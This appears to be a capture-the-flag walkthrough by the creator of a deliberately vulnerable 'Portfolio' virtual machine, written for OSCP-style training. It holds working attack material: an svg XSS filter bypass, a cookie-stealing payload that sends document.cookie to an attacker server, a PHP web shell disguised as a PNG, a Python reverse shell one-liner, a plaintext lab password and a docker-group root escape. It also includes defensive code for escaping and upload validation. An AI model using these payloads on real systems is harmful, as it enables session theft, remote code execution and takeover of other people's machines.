
CTF: Portfolio Walkthrough


Scenario

A passionate web developer recently launched his personal portfolio website, proudly displaying his projects and sharing his thoughts through a vibrant blog. His focus on design and functionality has left glaring security holes.

As his blog gains popularity, you, a skilled hacker, spot the perfect target. Your mission is clear: exploit the vulnerabilities, compromise his site, and expose his negligence. Every weakness is an opportunity, every oversight a path to control.

In this CTF challenge, you are the hacker. Uncover the flaws, break through the defenses, and leave your mark on the developer’s digital pride.

Welcome to "Portfolio CTF". The game is on. Good luck!

You can download the OVA for the Portfolio CTF from this link


SPOILER ALERT: Do not read further if you intend to solve the CTF challenge on your own. The write-up follows below.


Introduction

I created this Capture The Flag (CTF) machine with dual objectives: to provide a comprehensive training ground for enthusiasts interested in both Client-Side and Server-Side attacks, and to highlight essential skills and vulnerabilities in the cybersecurity field. This machine offers hands-on experience with Stored Cross-Site Scripting (XSS), enabling participants to understand the intricacies of injecting and persistently storing malicious scripts in web applications. It also challenges users to explore File Upload Vulnerabilities, emphasizing the importance of analyzing how servers handle uploaded file content rather than merely checking file extensions. Additionally, the machine encourages the discovery of hardcoded credentials, an essential skill for identifying sensitive information inadvertently left unprotected in code or configuration files. Finally, the Docker group privilege escalation challenge tests participants' problem-solving abilities in a unique way. Overall, this CTF machine delivers a holistic learning experience, equipping participants with critical skills and knowledge for effective cybersecurity practices. It's an excellent preparation tool for the OSCP exam. 

Host Discovery
sudo nmap -sn -vvv -T5 192.168.194.1/24 # 192.168.194.X replace with your NAT network


Enumeration 
Port and Services Enumeration 
export PORTFOLIO=192.168.194.138

Discover all open ports
nmap -p- --open -T4 $PORTFOLIO -oN portfolio.txt

Discover the services running on the open ports (written to a separate file so the full port scan output is not overwritten)
nmap -p22,80,443 -sCV -T4 $PORTFOLIO -oN portfolio-services.txt

Add the domain discovered during enumeration to the /etc/hosts file
echo "$PORTFOLIO portfolio.local" | sudo tee -a /etc/hosts



Navigate to the web application 

Inspect the source code of the application and discover the hidden subdomain 

Append the subdomain to the /etc/hosts file

echo "$PORTFOLIO blog.portfolio.local" | sudo tee -a /etc/hosts

Manually exploring the web application

We can see that it is a blog application

There is a login page at /login.php 

There is also a page at /post.php where we can write a post to the blog

Identifying Vulnerabilities 

Let's try to trigger an XSS 

<script>alert('XSS')</script>


We can see that there is some kind of filtering; let's try different HTML tags to trigger the XSS

Let's try the <img> tag 

<img src="x" onerror="alert('XSS')"/>

We can see that the image tag is filtered as well.

Let's try the <svg> tag

<svg xmlns='' onload='alert("XSS")'/>

We can see that we successfully triggered an XSS attack!
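The three attempts above show the classic failure of a tag blocklist: it strips the tags it knows about and lets everything else through. As an added illustration (not code from the CTF machine; the exact contents of the blog's filter are an assumption), the following Python models such a blocklist beside the correct fix, encoding output with html.escape so the browser renders the post as text rather than markup.

```python
import html
import re

# Constructed payloads mirroring the three attempts in the walkthrough.
PAYLOADS = {
    "script": "<script>alert('XSS')</script>",
    "img": '<img src="x" onerror="alert(\'XSS\')"/>',
    "svg": "<svg xmlns='' onload='alert(\"XSS\")'/>",
}

# Hypothetical blocklist of the kind the blog appears to use: it strips a
# fixed set of tag names and nothing else (assumption, not the real filter).
BLOCKED_TAGS = ("script", "img", "iframe")


def blocklist_filter(post_body: str) -> str:
    """Strip only the tags on the blocklist (the weak approach)."""
    pattern = r"</?(?:%s)\b[^>]*>" % "|".join(BLOCKED_TAGS)
    return re.sub(pattern, "", post_body, flags=re.IGNORECASE)


def escape_output(post_body: str) -> str:
    """Encode every HTML metacharacter, so no tag or handler can form at all."""
    return html.escape(post_body, quote=True)


# A tag carrying an on* event handler attribute, or a script tag, still executes.
EVENT_HANDLER = re.compile(r"<[a-z][^>]*\son[a-z]+\s*=", re.IGNORECASE)


def still_executable(rendered: str) -> bool:
    """True if the rendered string still contains executable markup."""
    return bool(EVENT_HANDLER.search(rendered)) or "<script" in rendered.lower()


def evaluate(filter_fn):
    """Map each payload name to whether it survives the given filter."""
    return {name: still_executable(filter_fn(p)) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    print("blocklist:", evaluate(blocklist_filter))  # svg survives
    print("escaping: ", evaluate(escape_output))     # nothing survives
```

Even with correct escaping, marking the session cookie HttpOnly keeps document.cookie out of reach of any script that does slip through.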

Foothold

Web Application Privilege Escalation (Stealing Session Cookies)

To steal a session cookie we must launch a server and craft an XSS payload that sends the session cookie to it.

Launch a python server 

python3 -m http.server 8080

Crafting the XSS payload 

<svg xmlns='' onload='fetch("http://[REDACTED]:8080/exfil?cookies=" + encodeURIComponent(document.cookie))'/>

Stealing the session cookie 

Store the session cookie in our browser and log in to the web application as admin


Enumerating Admin Portal 

We can see that a file upload function exists; let's try to upload a PHP web shell

PHP web shell 

Trying to upload the PHP web shell

We receive two errors: that the file is not an image, and that only jpg and png files are allowed.

Upload file vulnerability 

Launch Burp Suite 

burpsuite &

Open the Burp Suite browser and put the admin session cookie in it

Try to upload the web.php shell we tried earlier 

Navigate to Target > Site map, find the POST request to the upload page and send it to the Repeater

Bypassing extension 

We can bypass the extension check by uploading the web shell with the name web.jpg.php

We can see that we now receive a different error message: only that the file is not an image.

Bypassing file type check 

Find a PNG image (image.png)

Find the webshell we want to use 

Create the malicious image by concatenating the image and the web shell into a new file called image.png.php

cat image.png web.php > image.png.php

Uploading the malicious image

We see that the image uploaded successfully 

Navigate to the folder where the web shell is stored

We can see that we have RCE on the target machine.
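The bypass works because the server looks only at the extension loosely and apparently only checks that the content starts like an image, which the concatenated image.png.php satisfies. As an added example (not the portfolio app's code), this Python validator judges only the final extension and walks the PNG chunk structure to IEND, rejecting any bytes appended after it; the sample image is constructed in code, and for brevity the validator handles PNG only (a JPEG would need its own structure walker).

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXTENSIONS = {"png"}  # assumption: this validator handles PNG only


def make_png() -> bytes:
    """Build a minimal valid 1x1 PNG (constructed sample standing in for image.png)."""
    def chunk(ctype: bytes, data: bytes) -> bytes:
        crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1 pixel, 8-bit RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")          # filter byte + one RGB pixel
    return PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def extension_ok(filename: str) -> bool:
    """Judge only the final extension, so image.png.php and web.jpg.php are rejected."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def png_trailing_bytes(data: bytes) -> int:
    """Walk the chunks to IEND and return the number of bytes after it (0 = clean).
    Raises ValueError for a malformed PNG (bad signature, CRC or truncation)."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIGNATURE)
    while True:
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length + 4
        if end > len(data):
            raise ValueError("truncated chunk data")
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError("CRC mismatch in chunk %r" % ctype)
        pos = end
        if ctype == b"IEND":
            return len(data) - pos  # a `cat image.png web.php` polyglot is non-zero here


def accept_upload(filename: str, data: bytes) -> bool:
    """Accept only a whitelisted final extension AND a PNG with nothing after IEND."""
    if not extension_ok(filename):
        return False
    try:
        return png_trailing_bytes(data) == 0
    except ValueError:
        return False
```

Storing the accepted file under a server-generated name outside the web root removes the remaining risk that a stored file is ever executed rather than served.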

Getting a reverse shell 

Start a reverse listener 

nc -lvnp 1337

Sending a python reverse shell to the target 

export RHOST="[REDACTED]";export RPORT=1337;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Stabilizing our shell 

python3 -c 'import pty;pty.spawn("/bin/bash")'

^Z

stty -echo raw && fg

export TERM=xterm


Privilege Escalation 

From www-data to gpapadopoulos

Check our permissions 

id

Enumerate users 

cat /etc/passwd

List the files of the current directory 

ls -l

cd ../

ls

There is a config file, config.php

cat config.php

We can see that it contains the password of the user gpapadopoulos

Log in as gpapadopoulos

su - gpapadopoulos # with password Ju5t_4_d3v_mak1ng_s0ftwar3

Get the user flag user.txt

cat user.txt

SSH in as gpapadopoulos

ssh gpapadopoulos@portfolio.local

From gpapadopoulos to root

Enumerating the system manually

id

We can see that the user gpapadopoulos is in the docker group

Get a root shell 

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Get the root flag 

cat root.txt


